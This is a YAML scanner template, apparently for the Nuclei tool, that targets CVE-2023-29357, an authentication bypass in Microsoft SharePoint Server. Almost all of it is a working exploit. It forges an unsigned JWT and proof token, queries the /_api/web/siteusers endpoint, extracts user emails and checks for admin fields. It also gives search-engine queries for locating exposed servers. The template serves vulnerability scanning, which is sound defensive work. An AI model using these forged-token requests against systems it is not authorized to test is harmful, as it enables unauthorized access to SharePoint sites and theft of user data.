id: CVE-2023-29357

info:
  name: Microsoft SharePoint - Authentication Bypass
  author: pdteam
  severity: critical
  description: |
    Microsoft SharePoint Server Elevation of Privilege Vulnerability
  reference:
    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-29357
    - https://srcincite.io/advisories/src-2020-0022/
    - https://github.com/Chocapikk/CVE-2023-29357
    - https://sec.vnpt.vn/2023/08/phan-tich-cve-2023-29357-microsoft-sharepoint-validatetokenissuer-authentication-bypass-vulnerability/
    - https://starlabs.sg/blog/2023/09-sharepoint-pre-auth-rce-chain/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-29357
    epss-score: 0.76124
    epss-percentile: 0.97845
    cpe: cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: microsoft
    product: sharepoint_server
    shodan-query: http.headers_hash:-1968878704
    fofa-query: app="Microsoft-SharePoint"
  tags: cve,cve2023,microsoft,sharepoint_server
variables:
  client_id: "00000003-0000-0ff1-ce00-000000000000"

http:
  - raw:
      - |
        GET /_api/web/siteusers HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer
      - |
        GET /_api/web/siteusers HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Authorization: Bearer {{generate_jwt("{\"aud\":\"{{client_id}}@{{realm}}\",\"iss\":\"{{client_id}}\",\"nbf\":1695987703,\"exp\":2011547223,\"ver\":\"hashedprooftoken\",\"nameid\":\"{{client_id}}@{{realm}}\",\"endpointurl\":\"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\",\"endpointurlLength\":1,\"isloopback\":true}","none")}}AAA
        X-PROOF_TOKEN: {{generate_jwt("{\"aud\":\"{{client_id}}@{{realm}}\",\"iss\":\"{{client_id}}\",\"nbf\":1695987703,\"exp\":2011547223,\"ver\":\"hashedprooftoken\",\"nameid\":\"{{client_id}}@{{realm}}\",\"endpointurl\":\"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\",\"endpointurlLength\":1,\"isloopback\":true}","none")}}AAA

    extractors:
      - type: regex
        part: header
        group: 1
        name: realm
        regex:
          - realm="([^"]*)"
        internal: true

      - type: json
        json:
          - .value[].Email
    matchers:
      - type: word
        part: body_2
        words:
          - LoginName
          - Email
          - IsSiteAdmin
        condition: and
# digest: 4b0a00483046022100d076fe8b4f25640961c98471ec38a6a84e8ed8e0b198bcc4be0e3e11e5a9319d022100ec1230f37459e1442ca03861d5b0d4a35cf202754800b2fe672d3f17fa694c27:922c64590222798bb761d5b6d8e72950